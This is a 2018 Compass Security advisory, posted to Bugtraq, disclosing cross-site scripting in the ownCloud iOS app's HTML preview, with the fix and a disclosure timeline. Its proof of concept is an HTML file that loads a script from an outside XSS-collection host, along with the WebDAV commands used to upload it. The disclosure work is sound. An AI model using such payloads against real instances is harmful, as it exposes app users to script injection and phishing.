CSNC-2018-016 - ownCloud iOS Application - Cross-Site Scripting
Advisories <[email protected]> Wed, 15 Aug 2018 06:55:38 +0000
| Newsgroups | gmane.comp.security.bugtraq,gmane.comp.security.news.securitytracker |
|---|---|
| Message-ID | <[email protected]> |
############################################################# # # COMPASS SECURITY ADVISORY # https://www.compass-security.com/research/advisories/ # ############################################################# # # Product: ownCloud iOS Application (owncloud.iosapp) [1] # Vendor: ownCloud Gmbh # CSNC ID: CSNC-2018-016 # CVE ID: N/A # Subject: Cross-Site Scripting in ownCloud iOS Application's WebViews # Risk: Low # Effect: Remotely exploitable # Author: Sylvain Heiniger <[email protected]> # Date: 14.08.2018 # ############################################################# Introduction: ------------- HTML pages will be rendered in a WebView in the ownCloud iOS application. JavaScript will be executed in this WebView when previewing an HTML file. The webview is run in a sandbox, so no other data can be read a priori. How= ever, in case the WebView iself were to have a vulnerability, an attacker c= ould access other data of the application. The HTML rendering could also be= misused for phishing. Affected: --------- Vulnerable: * ownCloud Version 3.7.3 for iOS Not vulnerable: * ownCloud Android Application * ownCloud Server * ownCloud Version 3.7.5 for iOS Technical Description --------------------- Send an html file to an ownCloud instance, open it in the iOS application, = HTML gets interpreted. $ cat test.html <html> <script src=3D"https://hes.xss.ht"></script> <script>alert("this JavaScript is interpreted!");</script> </html> $dave -u admin -p [password] https://[your-instance].owncloud-demo.com/remo= te.php/webdav/ dave> put test.html put https://7pswlqfpkn.owncloud-demo.com/remote.php/webdav/test.html (117= bytes) (success) Workaround / Fix: ----------------- Since iOS 8 one can use the WKWebView class instead of using UIWebView. Set= ting the WKPreferences property javaScriptEnabled to false will prevent Jav= aScript to be run. This fixed has been implemented in release 3.7.5 [2]. Timeline: --------- 2018-08-14: Advisory publication 2018-07-09: Fix verification 2018-06-19: Release with fix publication 2018-03-16: Initial acknowledgment of the vulnerability 2018-03-14: Contact via HackerOne 2018-03-13: Discovery by Sylvain Heiniger References: ----------- [1] https://github.com/owncloud/ios [2] https://github.com/owncloud/ios/releases/tag/version_3.7.5